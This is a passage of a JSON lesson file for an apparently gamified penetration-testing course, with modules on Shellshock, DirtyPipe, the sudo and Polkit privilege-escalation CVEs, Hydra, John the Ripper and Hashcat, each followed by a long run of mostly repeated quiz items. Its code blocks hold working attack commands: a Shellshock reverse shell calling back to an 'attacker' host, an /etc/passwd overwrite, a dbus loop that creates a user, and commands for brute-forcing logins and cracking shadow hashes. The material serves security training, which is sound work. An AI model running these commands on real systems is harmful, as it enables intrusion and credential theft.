connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-shellshock","cat":"Exploitation","title":"Shellshock (CVE-2014-6271)","diff":2,"xp":150,"intro":"Bash function export bug allows remote code execution.","sections":[{"type":"text","content":"Shellshock exploits Bash's function import: environment variables with function definitions execute trailing commands. Affects CGI scripts, DHCP, SSH."},{"type":"code","lang":"bash","content":"# Test for Shellshock\ncurl -A '() { :; }; echo vulnerable' http://target/cgi-bin/test.sh\n# Reverse shell\ncurl -A '() { :; }; /bin/bash -i >& /dev/tcp/attacker/4444 0>&1' http://target/cgi-bin/test.sh"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Shellshock is triggered through...","opts":["SQL queries","Specially crafted environment variables processed by Bash","File uploads","Buffer overflow"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-dirty-pipe","cat":"Exploitation","title":"DirtyPipe (CVE-2022-0847)","diff":3,"xp":200,"intro":"Overwrite data in read-only files via a kernel pipe bug.","sections":[{"type":"text","content":"DirtyPipe exploits a kernel bug in pipe buffer management. Overwrite /etc/passwd to add a root user, or modify any SUID binary."},{"type":"code","lang":"bash","content":"# Kernels 5.8 <= version < 5.16.11 are vulnerable\nuname -r\n# Exploit: overwrite /etc/passwd\npython3 dirtypipe.py /etc/passwd 1 '${hacker_line}'\n# Or modify SUID binary\npython3 dirtypipe.py /usr/bin/su 0 $'x7fELF...'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"DirtyPipe allows writing to...","opts":["Only writable files","Read-only files (bypasses file permissions via kernel bug)","Only root's files","Network shares"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-sudo-cve-2019","cat":"Exploitation","title":"Sudo UID -1 Bypass (CVE-2019-14287)","diff":2,"xp":150,"intro":"Bypass sudo user restrictions with UID -1.","sections":[{"type":"text","content":"When sudoers says (ALL, !root), specifying UID -1 resolves to root due to an integer handling bug."},{"type":"code","lang":"bash","content":"# Sudoers: user ALL=(ALL, !root) /bin/bash\nsudo -u#-1 /bin/bash\n# UID -1 wraps to 0 (root)\nid  # uid=0(root)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"CVE-2019-14287 bypasses...","opts":["File permissions","Sudo rules that explicitly exclude root","Network ACLs","Encryption"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-polkit-cve","cat":"Exploitation","title":"Polkit CVE-2021-3560","diff":3,"xp":200,"intro":"Race condition in Polkit creates admin users without auth.","sections":[{"type":"text","content":"Kill a dbus request mid-flight. Polkit can't check the requesting PID (it's gone), so it authorizes by default."},{"type":"code","lang":"bash","content":"for i in $(seq 1 100); do\n  dbus-send --system --dest=org.freedesktop.Accounts --print-reply \\\n    /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \\\n    string:hacker string:'H' int32:1 & sleep 0.005s; kill $! 2>/dev/null\ndone"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"This CVE is a...","opts":["Buffer overflow","Race condition in authorization checking","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-bruteforce-hydra","cat":"Exploitation","title":"Hydra Brute Force Attacks","diff":1,"xp":75,"intro":"Brute force network service credentials.","sections":[{"type":"text","content":"Hydra supports: SSH, FTP, HTTP, RDP, MySQL, SMB, and many more. Parallel connections make it fast."},{"type":"code","lang":"bash","content":"hydra -l admin -P rockyou.txt ssh://target\nhydra -l admin -P wordlist.txt ftp://target\nhydra -l admin -P wordlist.txt target http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'\nhydra -l sa -P wordlist.txt target mssql"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Hydra supports brute forcing...","opts":["Only SSH","Many protocols: SSH, FTP, HTTP, RDP, MySQL, SMB","Only web forms","Only databases"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-john-cracking","cat":"Exploitation","title":"John the Ripper Password Cracking","diff":1,"xp":75,"intro":"Crack password hashes offline with wordlists and rules.","sections":[{"type":"text","content":"John supports: MD5, SHA, bcrypt, NTLM, Kerberos, ZIP, SSH keys, and more. Rules mutate wordlist entries for better coverage."},{"type":"code","lang":"bash","content":"john --wordlist=rockyou.txt --format=raw-md5 hashes.txt\njohn --wordlist=rockyou.txt --rules hashes.txt\njohn --show hashes.txt\n# Crack /etc/shadow\nunshadow /etc/passwd /etc/shadow > combined.txt\njohn combined.txt"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"John the Ripper rules...","opts":["Encrypt passwords","Mutate wordlist entries (add numbers, capitalize, etc.)","Speed up cracking","Decrypt hashes"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-hashcat-gpu","cat":"Exploitation","title":"Hashcat GPU Cracking","diff":2,"xp":150,"intro":"Leverage GPU power for billions of hashes per second.","sections":[{"type":"text","content":"Hashcat uses GPU acceleration. Mode numbers: 0=MD5, 1000=NTLM, 1800=SHA-512(Unix), 5600=NTLMv2, 13100=Kerberos."},{"type":"code","lang":"bash","content":"hashcat -m 0 md5_hashes.txt rockyou.txt  # MD5\nhashcat -m 1000 ntlm_hashes.txt rockyou.txt  # NTLM\nhashcat -m 5600 ntlmv2_hashes.txt rockyou.txt  # NTLMv2\nhashcat -m 13100 kerberoast_hashes.txt rockyou.txt  # Kerberos\nhashcat -m 22000 wifi_hashes.hc22000 rockyou.txt  # WPA"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Hashcat achieves speed through...","opts":["CPU optimization","GPU parallel processing (billions of hashes/sec)","Cloud computing","Quantum computing"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"px-px-shell-upgrade","cat":"Post-Exploitation","title":"Shell Upgrade to TTY","diff":1,"xp":50,"intro":"Upgrade a raw shell to interactive TTY.","sections":[{"type":"text","content":"Upgrade a raw shell to interactive TTY."},{"type":"code","lang":"bash","content":"python3 -c 'import pty;pty.spawn(\"/bin/bash\")' then stty raw -echo; fg"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Which command spawns a PTY?","opts":["ls","python3 pty.spawn","echo","cat"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely 